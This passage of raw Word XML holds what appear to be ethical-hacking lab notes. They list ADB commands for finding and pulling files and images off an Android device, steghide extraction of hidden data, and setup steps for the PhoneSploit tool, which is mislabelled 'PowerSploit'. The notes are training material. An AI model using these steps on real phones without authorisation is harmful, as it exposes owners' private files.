          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-type</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> d </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:color w:val="660033"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-name</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>"dir-name-here"</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881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>2</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&gt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="40B1305F" w14:textId="0D74A580">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R875d652d96c147b6">
        <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
            <w:noProof w:val="0"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.cyberciti.biz/faq/howto-find-a-directory-linux-command/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="0334799B" w14:textId="795B9C20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Download the folder or file </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="1ECC9493" w14:textId="4522AA13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>adb pull sdcard/log.txt /home/mmurphy/Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="100DADC6" w14:textId="572CC0F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">o calculate the sha384 hash of the file </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="43D9E284" w14:textId="5A8AFF29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sha384sum /path/to/your/file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="63BFFCE4" w14:textId="7CC465B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Locate and Pull Image File:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="3FF42678" w14:textId="778202D1">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">                 -&gt; adb shell find /sdcard/ -name "</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.jpg" -o -name "</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">.png" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="203744D9" w14:textId="5194407C">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">            -&gt; adb pull /sdcard/Downloads/CEH.jpg ./ceh.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="3FE0FD20" w14:textId="6AF671A4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noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Extract Hidden Data with Steghide:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="2F2304C5" w14:textId="1240A75C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-&gt; steghide extract -sf ceh.jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="64BBEBE1">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> or use openstego</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="03B55940" w14:textId="54716020">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Using PowerSploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="4E2E50CA" w14:textId="04095531">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Install PowerSploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="2C6F9ABE" w14:textId="197AD97C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="R17893e5ca7284ede">
        <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://github.com/aerosol-can/PhoneSploit</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="18274598" w14:textId="797FFB81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>cd PhoneSploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="4830B076" w14:textId="2BED405D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>pip3 install colorama</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="0D8746AC" w14:textId="7B1793B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="02CE14ED" w14:textId="5BFFB364">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>python3 -m pip install colorama</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="220AE072" w14:textId="5B9BF0E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Run Phonesploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="52B667F5" w14:textId="4624316D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
